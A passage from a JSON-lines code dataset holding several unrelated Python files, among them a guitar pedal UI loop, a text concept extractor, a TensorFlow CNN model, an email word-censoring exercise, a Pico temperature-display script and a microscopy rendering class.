0, \"IrBrowserModel\")\n engine = QQmlApplicationEngine()\n\n current_pedal_model = PolyValue(pedal_state[\"model\"], 0, -1, 1)\n # accent_color = PolyValue(\"#8BB8E8\", 0, -1, 1)\n accent_color = PolyValue(\"#FF75D0\", 0, -1, 1)\n current_ip = PolyValue(\"\", 0, -1, 1)\n\n # Expose the object to QML.\n # global context\n context = engine.rootContext()\n context.setContextProperty(\"knobs\", knobs)\n context.setContextProperty(\"loopler\", loopler)\n context.setContextProperty(\"module_browser_model\", module_browser_model_s)\n context.setContextProperty(\"preset_browser_model\", preset_browser_model_s)\n context.setContextProperty(\"amp_browser_model\", amp_browser_model_s)\n # context.setContextProperty(\"ir_browser_model\", ir_browser_model_s)\n change_pedal_model(pedal_state[\"model\"], True)\n context.setContextProperty(\"available_effects\", available_effects)\n context.setContextProperty(\"selectedSourceEffectPorts\", selected_source_effect_ports)\n context.setContextProperty(\"selectedDestEffectPorts\", selected_dest_effect_ports)\n context.setContextProperty(\"portConnections\", port_connections)\n # context.setContextProperty(\"effectPrototypes\", effect_prototypes)\n context.setContextProperty(\"updateCounter\", update_counter)\n context.setContextProperty(\"presetCounter\", preset_load_counter)\n context.setContextProperty(\"currentBPM\", current_bpm)\n context.setContextProperty(\"dspLoad\", dsp_load)\n context.setContextProperty(\"isPedalBypassed\", pedal_bypassed)\n context.setContextProperty(\"currentPreset\", current_preset)\n context.setContextProperty(\"commandStatus\", command_status)\n context.setContextProperty(\"delayNumBars\", delay_num_bars)\n context.setContextProperty(\"connectSourcePort\", connect_source_port)\n context.setContextProperty(\"midiChannel\", midi_channel)\n context.setContextProperty(\"isLoading\", is_loading)\n context.setContextProperty(\"inputLevel\", input_level)\n context.setContextProperty(\"currentPedalModel\", current_pedal_model)\n context.setContextProperty(\"accent_color\", accent_color)\n context.setContextProperty(\"presetList\", preset_list_model)\n context.setContextProperty(\"footSwitchQA\", foot_switch_qa)\n context.setContextProperty(\"encoderQA\", encoder_qa)\n context.setContextProperty(\"footSwitchWarning\", foot_switch_warning)\n context.setContextProperty(\"lToR\", is_l_to_r)\n context.setContextProperty(\"preset_description\", preset_description)\n context.setContextProperty(\"patchBayNotify\", patch_bay_notify)\n context.setContextProperty(\"favourites\", favourites)\n context.setContextProperty(\"pedalState\", pedal_state)\n context.setContextProperty(\"currentIP\", current_ip)\n engine.load(QUrl(\"qml/TopLevelWindow.qml\"))\n debug_print(\"starting send thread\")\n ingen_wrapper.start_send_thread()\n debug_print(\"starting recv thread\")\n ingen_wrapper.start_recv_thread(ui_messages)\n\n pedal_hardware.foot_callback = handle_foot_change\n pedal_hardware.encoder_change_callback = handle_encoder_change\n pedal_hardware.add_hardware_listeners()\n knobs.launch_task(0.5, handle_MIDI_program_change)\n\n # qWarning(\"logging with qwarning\")\n try:\n add_io()\n except Exception as e:\n debug_print(\"########## e1 is:\", e)\n ex_type, ex_value, tb = sys.exc_info()\n error = ex_type, ex_value, ''.join(traceback.format_tb(tb))\n debug_print(\"EXception is:\", error)\n sys.exit()\n\n sys._excepthook = sys.excepthook\n def exception_hook(exctype, value, tb):\n debug_print(\"except hook got a thing!\")\n traceback.print_exception(exctype, value, tb)\n sys._excepthook(exctype, value, tb)\n # sys.exit(1)\n sys.excepthook = exception_hook\n # try:\n # crash_here\n # except:\n # debug_print(\"caught crash\")\n # timer = QTimer()\n # timer.timeout.connect(tick)\n # timer.start(1000)\n\n def signalHandler(sig, frame):\n if sig in (SIGINT, SIGTERM):\n qWarning(\"frontend got signal\")\n # global EXIT_PROCESS\n EXIT_PROCESS[0] = True\n ingen_wrapper._FINISH = True\n ingen_wrapper.ingen._FINISH = True\n pedal_hardware.EXIT_THREADS = True\n ingen_wrapper.ingen.sock.close()\n signal(SIGINT, signalHandler)\n signal(SIGTERM, signalHandler)\n initial_preset = False\n debug_print(\"starting UI\")\n time.sleep(0.2)\n ingen_wrapper.get_state(\"/main\")\n # load_preset(\"file:///mnt/presets/Default_Preset.ingen/main.ttl\", False)\n # ingen_wrapper._FINISH = True\n update_dsp_usage_count = 200\n num_loops = 0\n while not EXIT_PROCESS[0]:\n # debug_print(\"processing events\")\n try:\n app.processEvents()\n # debug_print(\"processing ui messages\")\n process_ui_messages()\n pedal_hardware.process_input()\n if num_loops > update_dsp_usage_count:\n num_loops = 0\n ingen_wrapper.get_state(\"/engine\")\n except Exception as e:\n qCritical(\"########## e2 is:\"+ str(e))\n ex_type, ex_value, tb = sys.exc_info()\n error = ex_type, ex_value, ''.join(traceback.format_tb(tb))\n debug_print(\"EXception is:\", error)\n qCritical(\"########## exception is:\"+ str(error))\n sys.exit()\n sleep(0.01)\n\n qWarning(\"mainloop exited\")\n ingen_wrapper.s_thread.join()\n qWarning(\"s_thread exited\")\n if pedal_hardware.hw_thread is not None:\n qWarning(\"hw_thread joining\")\n pedal_hardware.hw_thread.join()\n qWarning(\"hw_thread exited\")\n ingen_wrapper.r_thread.join()\n qWarning(\"r_thread exited\")\n app.exit()\n sys.exit()\n qWarning(\"sys exit called\")\n # if not initial_preset:\n # load_preset(\"/presets/Default Preset.json\")\n # update_counter.value+=1\n # initial_preset = True\n","repo_name":"polyeffects/digit_ui","sub_path":"show_widget.py","file_name":"show_widget.py","file_ext":"py","file_size_in_byte":101051,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} +{"seq_id":"31066446154","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import (absolute_import, division,\n print_function, unicode_literals)\nfrom builtins import *\nfrom collections import defaultdict, namedtuple\nimport re\n\nfrom acora import AcoraBuilder\n\nfrom ncgocr.concept import Entity, Pattern, Constraint, Evidence, Index\nfrom txttk.corpus import Candidate\n\nGrounds = namedtuple('Grounds', 'evidences sentence')\n\ndef _fit_border(text, span):\n start, end = span\n left_border = text[max(0, start-1):start+1]\n right_border = text[end-1:end+1]\n judge = re.compile(r'(.\\b.|^.$)').match\n return all([judge(left_border),\n judge(right_border)])\n\nclass SolidExtractor(object):\n def __init__(self, term_index):\n self.term_index = term_index\n\n builder = AcoraBuilder()\n for text in term_index:\n builder.add(text)\n self.ac = builder.build()\n\n def findall(self, sentence):\n ac = self.ac\n term_index = self.term_index\n result = []\n offset = sentence.offset\n try:\n for text, raw_start in ac.findall(sentence.text):\n for primary_term in term_index[text]:\n start = raw_start + offset\n raw_end = raw_start + len(text)\n end = start + len(text)\n if _fit_border(sentence.text, (raw_start, raw_end)):\n evidence = Evidence(primary_term, text, start, end)\n result.append(evidence)\n except TypeError: # caused by empty ac\n return []\n return result\n\n def to_grounds(self, sentence):\n evidences = self.findall(sentence)\n grounds = Grounds(evidences, sentence)\n return grounds\n\nclass SoftExtractor(object):\n def __init__(self, regex_out):\n self.pattern_ex = re.compile(regex_out)\n\n def findall(self, sentence):\n ex = self.pattern_ex\n offset = sentence.offset\n result = []\n for m in ex.finditer(sentence.text):\n lemma = list(filter(lambda item: item[1] is not None, m.groupdict().items()))[0][0]\n raw_start, raw_end = m.span()\n text = sentence.text[raw_start:raw_end]\n start, end = raw_start + offset, raw_end + offset\n term = Pattern(lemma, 'annotator')\n evidence = Evidence(term, text, start, end)\n result.append(evidence)\n return result\n\n def to_grounds(self, sentence):\n evidences = self.findall(sentence)\n grounds = Grounds(evidences, sentence)\n return grounds\n\nclass JoinExtractor(object):\n def __init__(self, extractors):\n self.extractors = extractors\n\n def findall(self, sentence):\n result = []\n for extractor in self.extractors:\n result.extend(extractor.findall(sentence))\n result.sort(key=lambda e: e.start)\n return result\n\n def to_grounds(self, sentence):\n evidences = self.findall(sentence)\n grounds = Grounds(evidences, sentence)\n return grounds\n\n def process(self, corpus):\n corpus_grounds = []\n for sentence in corpus:\n corpus_grounds.append(self.to_grounds(sentence))\n return corpus_grounds\n\n\ndef nearest_evidences(current_position, wanted_terms, position_index):\n found_evidences = []\n for term in wanted_terms:\n positional_evidences = position_index[term]\n if len(positional_evidences) > 0:\n distance_evidence = [(abs(current_position - position), evidence)\n for position, evidence in positional_evidences]\n distance_evidence.sort(key=lambda it:it[0])\n found_evidences.append(distance_evidence[0][1])\n found_evidences.sort()\n return found_evidences\n\n\ndef has_entity(statement):\n if any([isinstance(term, Entity) for term in statement.terms()]):\n return True\n return False\n\nclass CandidateReconizer(object):\n def __init__(self, Im):\n \"\"\"stat_index = Index()\n for goid, concept in godata.items():\n for statement in concept.statements:\n for term in statement.terms():\n if has_entity(statement) and isinstance(term, Entity):\n stat_index[term].add(statement)\n elif not has_entity(statement):\n stat_index[term].add(statement)\n\n stat_index.use_default = False\"\"\"\n self.Im = Im\n\n def generate(self, grounds):\n \"\"\"\n This function looks so complex because I only want to report the nearest evidence\n Maybe there is a more elegant way, but I have no idea, currently.\n \"\"\"\n stat_index = self.Im\n result_candidates = []\n\n positional_evidences = list(enumerate(grounds.evidences))\n\n #The first loop, build the positional_index\n position_index = defaultdict(list)\n for position, evidence in positional_evidences:\n position_index[evidence.term].append((position, evidence))\n\n #The second loop, gathering evidences\n for position, evidence in positional_evidences:\n statements = stat_index[evidence.term]\n for statement in statements:\n wanted_terms = statement.terms()\n found_evidences = nearest_evidences(position, wanted_terms, position_index)\n candidate = Candidate(statement, found_evidences, grounds.sentence)\n result_candidates.append(candidate)\n return result_candidates\n\n def process(self, corpus_grounds):\n corpus_candidates = []\n for grounds in corpus_grounds:\n candidates = self.generate(grounds)\n corpus_candidates.extend(candidates)\n return corpus_candidates\n\n\n\"\"\"\nclass CandidateFinder(object):\n def __init__(self, extractor):\n solid_extractor = SolidExtractor(Ie)\n soft_extractor = SoftExtractor(regex_out)\n if boost_Ie is None:\n self.extractor = JoinExtractor([solid_extractor, soft_extractor])\n else:\n boost_extractor = SolidExtractor(boost_Ie)\n self.ex\n soft_extractor = SoftExtractor(regex_out)\n if auxiliary_extractor is not None:\n self.extractor = JoinExtractor([solid_extractor,\n soft_extractor,\n auxiliary_extractor])\n else:\n self.extractor = JoinExtractor([solid_extractor,\n soft_extractor])\n self.recognizer = CandidateReconizer(godata)\n\n def _findall(self, sentence):\n grounds = self.extractor.to_grounds(sentence)\n candidates = self.recognizer.generate(grounds)\n return candidates\n\n def findall(self, corpus):\n result = []\n for sentence in corpus:\n result.extend(self._findall(sentence))\n return result\n\"\"\"\n","repo_name":"jeroyang/ncgocr","sub_path":"ncgocr/extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":6963,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"70230258472","text":"## Convolutional Neural Network Model\n\n# Imports\nimport numpy as np\n# Tensorflow needs to be LAST import\nimport tensorflow as tf\nfrom tensorflow.contrib import layers\n\n\nclass ModelGraph:\n def __init__(self,\n s,# s - sizes of [image(heigth=width), image(depth=channel), mask]\n sK,# s - sizes of [kernel1, kernel2, ...]\n reg,# regularization weights [Kernel,Mask,Weights]\n init_scales,# # rows: kernel,mask,weights; columns: mean, sd\n N,# N - number of neurons\n num_kern,# num_kern - number of kernels per conv layer\n act_fn,# activation functions for each kernel = 'ID' or 'relu'\n kernel_constraint=None,# constraint on read out weights - 'norm' == 1\n weights_constraint=None,# constraint on read out weights - 'abs','norm','absnorm'\n mask_constraint=None,# constraint on mask - 'abs'\n final_relu=False,\n batch_norm=True,#whether to use batchnorm\n bn_cent=False,#add offset after batchnorm? default=no\n tf_seed=None,#tensorflow random seed\n np_seed=None,#numpy random seed\n init_kernel=np.array([]),# init_* - explicit initial values\n init_weights=np.array([]),\n init_mask=np.array([])):\n \n #set np random seed\n np.random.seed(np_seed)\n \n self.graph = tf.Graph()#new tf graph\n with self.graph.as_default():#use it as default\n \n #set random seed\n tf.set_random_seed(tf_seed)\n \n #input tensor of shape NCHW\n self.X = tf.placeholder(tf.float32,shape=[None,s[1],s[0],s[0]])\n #output: N x None\n self.Y = tf.placeholder(tf.float32)\n \n #batch normalization settings\n self.is_train = tf.placeholder(tf.bool) \n \n #use tf.layers when kernel weights unconstrained\n if kernel_constraint==None:\n \n if batch_norm:\n normalizer = layers.batch_norm\n bn_params = dict(decay=.998,\n center=bn_cent,\n scale=False,\n is_training=self.is_train,\n data_format='NCHW',\n variables_collections=['batch_norm_ema'])\n else:\n normalizer = None\n bn_params = None\n\n # Convolutional layers\n self.conv = []# list with conv outputs\n self.WK = []# list with conv weights\n for c in range(len(num_kern)):\n # Inputs used by layer\n if c==0:\n inputs = tf.layers.dropout(self.X,\n rate=reg[3],\n training=self.is_train)\n else:\n inputs = tf.layers.dropout(self.conv[c-1],\n rate=reg[3],\n training=self.is_train)\n\n # Activation function\n if act_fn[c] == 'ID':\n act = tf.identity\n elif act_fn[c] == 'relu':\n act = tf.nn.relu\n else:\n raise ValueError('activation function not defined')\n\n # scope of variables in this layer\n scope = 'conv'+str(c)\n\n # Layer\n self.conv.append(layers.convolution2d(\n inputs=inputs,\n data_format='NCHW',\n num_outputs=num_kern[c],\n kernel_size=sK[c],\n stride=1,\n padding='VALID',\n activation_fn=act,\n normalizer_fn=normalizer,\n normalizer_params=bn_params,\n weights_initializer=tf.random_normal_initializer(mean=init_scales[0,0],\n stddev=init_scales[0,1]),\n #tf.constant_initializer(init_kernel),\n #trainable=False,\n scope=scope))\n\n #WK Kernel - filter / tensor of shape H-W-InChannels-OutChannels\n with tf.variable_scope(scope, reuse=True):\n self.WK.append(tf.get_variable('weights'))\n if kernel_constraint == 'norm':\n self.WK[-1] /= (1e-5 + tf.sqrt(tf.reduce_sum(tf.square(self.WK[-1]),\n [0,1], keep_dims=True)))\n \n #if kernels normalized in one layer net, do manually:\n elif kernel_constraint=='norm':\n self.WK = tf.get_variable(\n 'kernels',\n shape=[sK[0], sK[0], s[1], num_kern[0]],\n initializer=tf.truncated_normal_initializer(\n mean=init_scales[0,0],\n stddev=init_scales[0,1]))\n \n self.WK = [self.WK / (1e-5 + tf.sqrt(tf.reduce_sum(tf.square(self.WK), [0,1], keep_dims=True)))]\n self.conv = [tf.nn.conv2d(self.X, self.WK[-1], [1, 1, 1, 1],\n padding='VALID',data_format='NCHW')]\n \n # Batch_norm update op\n self.update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n \n ## Location layer - each neuron has one location mask\n #WM - Mask\n if init_mask.size:\n self.WM_init = init_mask\n else:\n self.WM_init = tf.random_normal([s[2]**2,N],init_scales[1,0],init_scales[1,1])\n\n \n self.WM = tf.Variable(self.WM_init,dtype=tf.float32, name='WM')\n \n if mask_constraint == 'abs':\n self.WM = tf.abs(self.WM)\n \n self.mask = tf.reshape(tf.matmul(tf.reshape(self.conv[-1],[-1,s[2]**2]),\n self.WM),[-1,num_kern[-1],N])\n \n #Weighing Layer - again factorized per neuron\n #WW - Read Out Weights\n if init_weights.size:\n self.WW_init = init_weights\n else:\n self.WW_init = tf.random_normal([num_kern[-1],N],\n init_scales[2,0],init_scales[2,1])\n self.WW = tf.Variable(self.WW_init,dtype=tf.float32, name='WW')\n\n #Apply constraint to read out weights\n if weights_constraint == 'abs':\n self.WW = tf.abs(self.WW)\n if weights_constraint == 'norm':\n self.WW /= (1e-5 + tf.sqrt(tf.reduce_sum(tf.square(self.WW),0,keep_dims=True)))\n if weights_constraint == 'absnorm':\n self.WW = tf.abs(self.WW) / (1e-5+tf.sqrt(tf.reduce_sum(tf.square(self.WW),0,keep_dims=True)))\n \n #when only one feature, skip feature weighing\n if num_kern[-1]==1:\n self.Y_ = tf.transpose(tf.squeeze(self.mask))#N x D\n else:\n #Predicted Output\n self.Y_ = tf.squeeze(tf.transpose(tf.reduce_sum(tf.multiply(self.mask,\n self.WW), 1, keep_dims=True)))#N x D\n \n if final_relu:\n self.Y_ = tf.transpose(tf.contrib.layers.bias_add(tf.transpose(self.Y_),\n activation_fn = tf.nn.relu))\n\n #Regularization\n self.regK = tf.contrib.layers.apply_regularization(\n tf.contrib.layers.l2_regularizer(1e-4),\n weights_list=self.WK)# L2 norm on conv weights\n self.regM = tf.reduce_mean(tf.reduce_sum(tf.abs(self.WM),0)) #L1 Loss on mask\n self.regW = tf.reduce_mean(tf.reduce_sum(tf.abs(self.WW),0)) #L1 Loss on read out weights\n\n #Define a loss function\n self.res = self.Y_-self.Y# residuals\n self.MSE = tf.reduce_mean(tf.reduce_mean(self.res * self.res,1))\n self.loss = self.MSE + reg[0]*self.regK + reg[1]*self.regM + reg[2]*self.regW\n #self.poisson = tf.reduce_sum(tf.nn.log_poisson_loss(tf.log(self.Y_),self.Y))\n\n #Define a training graph\n self.step_size= tf.placeholder(tf.float32)\n self.training = tf.train.AdamOptimizer(self.step_size).minimize(self.loss)\n\n # Create a saver.\n self.saver = tf.train.Saver()","repo_name":"david-klindt/NIPS2017","sub_path":"CNN.py","file_name":"CNN.py","file_ext":"py","file_size_in_byte":9079,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"72"} +{"seq_id":"21349703385","text":"single_string_sample_text = \"bada bee da be da bo bo be ba be de doe learning algorithms cha cha cha HOY.\"\nproprietary_terms = [\"she\", \"personality matrix\", \"sense of self\", \"self-preservation\", \"learning algorithm\", \"her\", \"herself\"]\nemail_one = open(\"email_one.txt\", \"r\").read()\nemail_two = open(\"email_two.txt\", \"r\").read()\nemail_three = open(\"email_three.txt\", \"r\").read()\nemail_four = open(\"email_four.txt\", \"r\").read()\n\n# def censor_single_phrase(email_input) :\n# \t#defining word to be censored\n# \tcensored_phrase = \"learning algorithms\"\n# \tif censored_phrase in email_input :\n# \t\tnew_input = email_input.replace(censored_phrase, \"[Redacted]\")\n# \treturn new_input \n\ndef censor_open_words(old_input) :\n\tsplit_email_input = old_input.split(' ')\n\tnew_input = []\n\tfor word in split_email_input :\n\t\t#for words without paragraphs\n\t\t\tif word.lower() in proprietary_terms :\n\t\t\t\tfor letter in word :\n\t\t\t\t\tnew_input.append('*')\n\t\t\t\tnew_input.append(' ')\n\t\t\telse :\n\t\t\t\tnew_input.append(word + ' ')\n\n\tjoined_email_input = ''.join(new_input)\n\treturn joined_email_input\n\ndef censor_paragraph_words(old_input) :\n\tsplit_input = old_input.split(' ')\n\tnew_input = []\n\tfor word in split_input :\n\t\t#for words without paragraphs\n\t\tif \"\\n\" not in word:\n\t\t\tif word.lower() in proprietary_terms :\n\t\t\t\tfor letter in word :\n\t\t\t\t\tnew_input.append('*')\n\t\t\t\tnew_input.append(' ')\n\t\t\telse :\n\t\t\t\tnew_input.append(word + ' ')\n\t\t#for words in between paragraphs\n\t\telse :\n\t\t\tparagraph_words = word.split(\"\\n\")\n\t\t\t# print(paragraph_words)\n\t\t\tfor word in paragraph_words :\n\t\t\t\tif word.lower() in proprietary_terms :\n\t\t\t\t\tfor letter in word :\n\t\t\t\t\t\tnew_input.append('*')\n\t\t\t\t\tnew_input.append(' ')\n\t\t\t\telse :\n\t\t\t\t\tif word == paragraph_words[-1] :\n\t\t\t\t\t\tnew_input.append(word + ' ')\n\t\t\t\t\telse:\n\t\t\t\t\t\tnew_input.append(word + '\\n')\n\n\tjoined_email_input = ''.join(new_input)\t\t\t\t\n\treturn joined_email_input\n\ndef censor_multiple_word_phrases(old_input) :\n\tsplit_input = old_input.split(' ')\n\tnew_input = []\n\tfor word in split_input :\n\n\t\tfor term in proprietary_terms :\n\t\t\tsplit_proprietary_term = term.split(' ')\n\t\t\tif len(split_proprietary_term) > 1 :\n\t\t\t\tfirst_word_in_phrase = split_proprietary_term[0]\n\t\t\t\tif word == first_word_in_phrase :\n\t\t\t\t\tlocation_of_first_phrase_word_in_email = split_input.index(first_word_in_phrase)\n\n\n\t\t\t\t\n\t\t\t\t\t\n\n\n\t\t\t\t\n\n\ndef censor_multiple_phrases(email_input) :\n\tbefore_censorship = email_input\n\n\tinitial_censor = censor_open_words(before_censorship)\n\t# print(initial_censor)\n\n\tsecond_censor = censor_paragraph_words(initial_censor)\n\tprint(second_censor)\n\n\tcensor_multiple_word_phrases(second_censor)\n\n\n\n\n# print(censor_single_phrase(email_one))\ncensor_multiple_phrases(email_two)\n","repo_name":"ThatGuy4975/Censor_emails","sub_path":"censor_dispenser.py","file_name":"censor_dispenser.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74834456232","text":"from machine import Pin, I2C\nimport onewire\nimport ds18x20\nimport time\nfrom machine_i2c_lcd import I2cLcd\n\n# GP0 - SDA, GP1 - SCL\ni2c_bus = I2C(0, scl=Pin(1), sda=Pin(0), freq=2000000)\n\n# get address of i2c deivce\naddr = i2c_bus.scan()[0]\n\n# create object i2clcd\nlcd = I2cLcd(i2c_bus, addr, 2, 16) # 2 line, 16 characters\n\n# draw greetings\nlcd.putstr(\"Hello RPi Pico!\\n\")\n\nds_pin = Pin(16) # GP16 - DS18B20's OUT Pin\n\n# create ds_sensor object via onewire protocol\nds_sensor = ds18x20.DS18X20(onewire.OneWire(ds_pin))\n\nroms = ds_sensor.scan()\nprint(\"Found a ds18x20 device\")\n\nwhile True:\n ds_sensor.convert_temp()\n time.sleep_ms(750)\n for rom in roms:\n #print(ds_sensor.read_temp(rom))\n lcd.putstr(\"DS18B20 Detect\\n\")\n lcd.putstr(\"Temp: {:.2f}\\n\".format(ds_sensor.read_temp(rom)))\n time.sleep(3)\n lcd.clear() # clear screen.\n \n\n\n\n\n","repo_name":"geeekpi/picokitadv","sub_path":"demo_codes/Project_30_LCD1602_with_DS18B20_sensor.py","file_name":"Project_30_LCD1602_with_DS18B20_sensor.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"72"} +{"seq_id":"73948465514","text":"import os\nimport ast\nimport configparser\n\nfrom skimage import color\nfrom skimage import exposure\nfrom skimage import draw\nimport shapely.wkt\nimport numpy as np\nimport pandas as pd\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\nfrom matplotlib.figure import Figure\nfrom shapely.geometry.point import Point\nfrom shapely import affinity\nfrom shapely.wkt import dumps\nfrom shapely.geometry import LineString, MultiLineString, Polygon\n\nfrom plots import utils as p\nimport measurements as m\nfrom .exceptions import ImagesFolderNotFound, NoSamplesError\nfrom . import Montage, ensure_dir, logger\nfrom gui.utils import canvas_to_pil\n\n_hist_edges_arr_ops = {\"precision\": 2, \"separator\": \",\", \"suppress_small\": True,\n \"formatter\": {\"float\": lambda x: \"%0.2f\" % x}}\n\n\nclass ConfiguredChannels(Montage):\n\n def __init__(self, base_path, row=None, col=None, condition_name=None):\n logger.info('Initializing FourChannels object with pandas file from folder %s' % base_path)\n try:\n super().__init__(base_path, row=row, col=col, condition_name=condition_name)\n except ImagesFolderNotFound:\n logger.warning(\"no images folder found.\")\n self.images_path = os.path.join(base_path, 'Images')\n\n self._samples = None\n self._cfg = None\n self._row = None\n self._col = None\n self._fid = None\n self._zp = None\n self._mdf = pd.DataFrame() # here we store all measurements\n\n def samples_are_well_formed(self, raise_exception=False):\n if np.any([i not in self.samples for i in ['row', 'col', 'fid']]):\n is_row, is_col, is_fid = [i in self.samples for i in ['row', 'col', 'fid']]\n _txt = 'key columns not in dataframe row=%s col=%s fid=%s' % (is_row, is_col, is_fid)\n if raise_exception:\n raise NoSamplesError(_txt)\n else:\n logger.warning(_txt)\n\n return False\n return True\n\n @property\n def samples(self):\n if self._samples is not None: return self._samples\n pd_path = os.path.join(self.base_path, 'out', 'nuclei.pandas')\n if os.path.exists(pd_path):\n self._samples = pd.read_pickle(pd_path)\n if self.samples_are_well_formed(raise_exception=True): pass\n else:\n logger.warning('no pandas file found.')\n return self._samples\n\n @staticmethod\n def filename_of_render(row, basepath, ext='jpg'):\n name = 'r%d-c%d-i%d.%s' % (row['row'], row['col'], row['fid'], ext)\n if os.path.basename(basepath) == 'render':\n path = os.path.abspath(os.path.join(basepath, name))\n else:\n path = os.path.abspath(os.path.join(basepath, 'render', name))\n return name, path\n\n @staticmethod\n def _load_cfg(path):\n with open(path, 'r') as configfile:\n logger.info('loading configuration from %s' % path)\n config = configparser.ConfigParser()\n config.read_file(configfile)\n\n section = 'General'\n if config.has_section(section):\n channels = config.getint(section, 'channels')\n\n ch = list()\n for c in range(1, channels + 1):\n section = 'Channel %d' % c\n if config.has_section(section):\n ch.append({\n 'number': config.getint(section, 'number'),\n 'channel name': config.get(section, 'channel name'),\n 'z_stack_aggregation': config.get(section, 'z_stack_aggregation',\n fallback='do a max projection'),\n 'tag': config.get(section, 'tag'),\n 'pipeline': ast.literal_eval(config.get(section, 'pipeline')),\n 'rng_thickness': config.getfloat(section, 'rng_thickness', fallback=0),\n 'n_lines': config.getint(section, 'n_lines', fallback=3),\n 'hist_bins': config.getint(section, 'hist_bins', fallback=10),\n 'hist_min': config.getint(section, 'hist_min', fallback=0),\n 'hist_max': config.getint(section, 'hist_max', fallback=np.iinfo(np.uint16).max),\n 'hist_log': config.getboolean(section, 'hist_log', fallback=False),\n 'render': config.getboolean(section, 'render'),\n 'render intensity': config.getfloat(section, 'render intensity'),\n 'flatfield': config.getboolean(section, 'flat field correction')\n })\n return {'channels': ch}\n\n def _save_cfg(self, path):\n with open(path, 'w') as configfile:\n config = configparser.RawConfigParser(allow_no_value=True)\n config.add_section('Information')\n config.set('Information', '#')\n config.set('Information', '# allowed functions for the pipeline are: nucleus, cell, histogram, ')\n config.set('Information', '# intensity_in_nucleus, ring_around_nucleus, particle_in_cytoplasm,')\n config.set('Information', '# line_intensity_ring, histogram_of_nucleus, histogram_of_ring.')\n config.set('Information', '#')\n config.set('Information', '#')\n config.set('Information', '# Accepted parameters:')\n config.set('Information', '# for z_stack_aggregation on every Channel: Aggregation op to do on ')\n config.set('Information', '# the z-stack. Can be one of the following:')\n config.set('Information', '# use each image individually')\n config.set('Information', '# do a max projection')\n config.set('Information', '#')\n config.set('Information', '# for ring_around_nucleus:')\n config.set('Information', '# rng_thickness: Thickness of the ring, in um.')\n config.set('Information', '#')\n config.set('Information', '# for histogram:')\n config.set('Information', '# hist_bins: Number of bins to use.')\n config.set('Information', '# hist_min: Lower boundary for bins.')\n config.set('Information', '# hist_max: Upper boundary for bins.')\n config.set('Information', '# hist_log: Makes bin to look equally sized on a log scale.')\n config.set('Information', '#')\n config.set('Information', '# for line_intensity_ring:')\n config.set('Information', '# n_lines: Number of lines to measure.')\n config.set('Information', '#')\n config.set('Information', '#')\n\n config.add_section('General')\n config.set('General', 'Version', 'v0.2')\n config.set('General', 'channels', len(self.channels))\n\n for i, c in enumerate(sorted(self.channels)):\n section = 'Channel %d' % c\n config.add_section(section)\n config.set(section, 'number', c - 1)\n config.set(section, 'channel name', self.files.loc[self.files['ch'] == c, 'ChannelName'].iloc[0])\n config.set(section, 'tag', 'default')\n config.set(section, 'pipeline', [])\n config.set(section, 'z_stack_aggregation', 'do a max projection')\n config.set(section, 'rng_thickness', 3)\n config.set(section, 'n_lines', 3)\n config.set(section, 'hist_bins', 100)\n config.set(section, 'hist_min', 0)\n config.set(section, 'hist_max', np.iinfo(np.uint16).max)\n config.set(section, 'hist_log', True)\n config.set(section, 'render', False)\n config.set(section, 'render intensity', 0.1)\n config.set(section, 'flat field correction', True)\n\n config.write(configfile)\n\n @property\n def configuration(self):\n \"\"\" Reads (or creates if non existent) the configuration file for the dataset \"\"\"\n if self._cfg is not None: return self._cfg\n cfg_path = os.path.join(self.base_path, 'out', 'operetta.cfg')\n if not os.path.exists(cfg_path):\n self._save_cfg(cfg_path)\n self._cfg = self._load_cfg(cfg_path)\n return self._cfg\n\n def save_render(self, *args, **kwargs):\n assert self.samples is not None, 'pandas samples file is needed to use this function'\n if len(args) == 1 and isinstance(args[0], int):\n _id = args[0]\n if not self.samples_are_well_formed():\n logger.warning(\"couldn't render because there was either an incorrect measurement or none a all\")\n return\n r = self.files_gr.ix[_id - 1]\n row, col, fid = r['row'], r['col'], r['fid']\n logger.debug('rendering id=%d row=%d col=%d fid=%d' % (_id, row, col, fid))\n\n elif len(args) == 3 and np.all([np.issubdtype(a, np.integer) for a in args]):\n row, col, fid = args[0], args[1], args[2]\n else:\n logger.warning(\"there's nothing to render\")\n return\n\n s = self.samples\n dfi = s[(s['row'] == row) & (s['col'] == col) & (s['fid'] == fid)]\n\n # create path where the images are going to be stored\n if 'path' not in kwargs:\n basepath = os.path.dirname(self.images_path)\n basepath = os.path.abspath(os.path.join(basepath, 'out', 'render'))\n else:\n basepath = os.path.abspath(kwargs['path'])\n\n cfg_ch = self.configuration['channels']\n\n # canvas for overall image\n max_width = kwargs['max_width'] if 'max_width' in kwargs else None\n fig_general = Figure((max_width * 4 / 150, max_width * 4 / 150), dpi=150)\n canvas_g = FigureCanvas(fig_general)\n # canvas for closeup image\n fig_closeup = Figure((max_width / 150, max_width / 150), dpi=150)\n canvas_c = FigureCanvas(fig_closeup)\n\n for _ip, dpos in dfi.groupby('p'):\n # get images for render\n if _ip in [\"max\"]: # ,\"min\",\"avg\"]:\n images = self.max_projection(row, col, fid)\n else:\n images = self.image(row, col, fid, _ip)\n\n # ----------------------\n # BACKGROUND IMAGE\n # ----------------------\n background = np.zeros(images[0].shape + (3,), dtype=np.float64)\n for ch in cfg_ch:\n _img = images[ch['number']]\n if ch['flatfield']:\n _img = self._flat_field_correct(_img, ch['number'])\n _img = exposure.equalize_hist(_img)\n _img = color.gray2rgb(_img)\n\n for operation in ch['pipeline']:\n if operation == 'nucleus' and ch['render']:\n background += _img * p.colors.hoechst_33342 * ch['render intensity']\n if operation == 'cell' and ch['render']:\n background += _img * p.colors.alexa_488 * ch['render intensity']\n if operation == 'intensity_in_nucleus' and ch['render']:\n background += _img * p.colors.alexa_647 * ch['render intensity']\n if operation == 'ring_around_nucleus' and ch['render']:\n background += _img * p.colors.alexa_647 